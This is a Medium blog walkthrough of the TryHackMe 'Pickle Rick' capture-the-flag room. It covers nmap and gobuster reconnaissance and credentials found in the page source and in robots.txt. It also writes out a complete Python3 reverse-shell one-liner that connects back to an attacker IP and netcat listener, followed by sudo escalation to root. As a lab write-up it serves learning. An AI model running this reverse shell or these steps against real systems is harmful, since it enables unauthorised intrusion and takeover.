Pickle Rick(Tryhackme) Room Writeup By Jonty Bhardwaj

Hello Reader, I am Jonty Bhardwaj currently enrolled in Master Certificate in Cyber Security HackerU program. Today I am here to share a writeup on a Tryhackme machine called Pickle Rick.

Now first of all we will navigate to the Room URL and join it.

https://tryhackme.com/room/picklerick

After starting the Machine we will first connect through Open VPN and ping the machine through the IP we are given to see if the connection is established. After we are successful in pinging the machine, we will start the fun part which is Pentesting and getting root privilege.

ping 10.10.32.250

Now first we will start a Nmap scan to see what are the ports and services open on the machine.

nmap -sV -sT -t4 10.10.32.250

Now we can see that 2 ports are open and the most promising port we can gather info looks to be port 80. Lets see what’s on the website there.

http://10.10.32.250/

Searching the source code of the main webpage we found some useful information in form of an Username.

view-source:http://10.10.32.250/

Now we see that’s there is robots.txt file on the server and opening it we found some text written in it . It looks to be some sort of password .

Robots.txt

Till now we have found a username and text resembling password .

Username : R1ckRul3s

Password : Wubbalubbadubdub

Now lets find some more info on the website by running Gobuster scan to see if there are any hidden webpages or directories.

gobuster -Pn dir -u http://10.10.32.250/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 100 -x php

Running the gobuster scan we found out that there is a login page on the server named /logon.php

Lets open this webpage see whats in there.

With the credentials we have gathered we login into the webpage successfully and found a command tab.

We can exploit this command tab to see critical information on the server or even run reverse shell on it and get a shell back on our system.

On the command tab we ran the ls command and found out that there are many files on the server.

ls

Here we see that we have found the first ingredient file named Sup3rS3cretPickl3Ingred.txt

Lets open this file on the browser and see what’s the ingredient .

http://10.10.32.250/Sup3rS3cretPickl3Ingred.txt

We have found our First Ingredient .

Now lets try to run a single liner reverse shell command on the server and try to get a shell back on our listner .

Lets open our listener first.

nc -lnvp 4444

Listener is open and ready now we have to run a reverse shell command on the command panel to get a shell back.

We searched if the machine has python installed or not

which python3

Python 3 is installed in the system which means we can use python 3 reverse shell .

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.8.107.42”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’

As soon as we executed the reverse shell on the command panel we got a shell back on our listener .

After some searching we found the second ingredient in the user rick directory .

cat /home/rick/”second ingredients”

Now lets see the permissions of this user if we can access the root directory or not .

As we can see here the user has all the permissions of sudo and looks like to be a sudo user .

It makes our job extremely easy as we don’t have to exploit any program to get root privilege .

sudo su

cat /root/3rd.txt

Here we have successfully escalated to root shell after using the exploit command and found the third ingredient in the root folder.

Proof of Completion

Congratulations on completing the room and reading the blog . Hope my blog helped you in your journey and made you learn something new .

Happy Hacking !!

--

--

--

Avid learner and writer trying to gain as much knowledge as possible in the domain of cyber security while sharing my learning to help other people like myself.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cybersecurity in Healthcare

How to Improve Your Online Privacy and Security?

GOBNB token launched on PancakeSwap

Python 6 Malware Encryption

{UPDATE} Impossible Track Motor Bike Rider: Stunt Man Race Hack Free Resources Generator

CovenantSQL & Data Security | CSTC conference sharing

Hashbon Space: KYC

{UPDATE} Idle Makeover Hack Free Resources Generator

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Jonty Bhardwaj

Jonty Bhardwaj

Avid learner and writer trying to gain as much knowledge as possible in the domain of cyber security while sharing my learning to help other people like myself.

More from Medium

Log4j Malware — Charming Kitten

TryHackMe-Gotta Catch’em All!(Pokemon)- Walkthrough by Subhadip Nag(MrL0s3r)

elasticpwn: how to collect and analyse data from exposed Elasticsearch and Kibana instances

Anatolia CTF Machine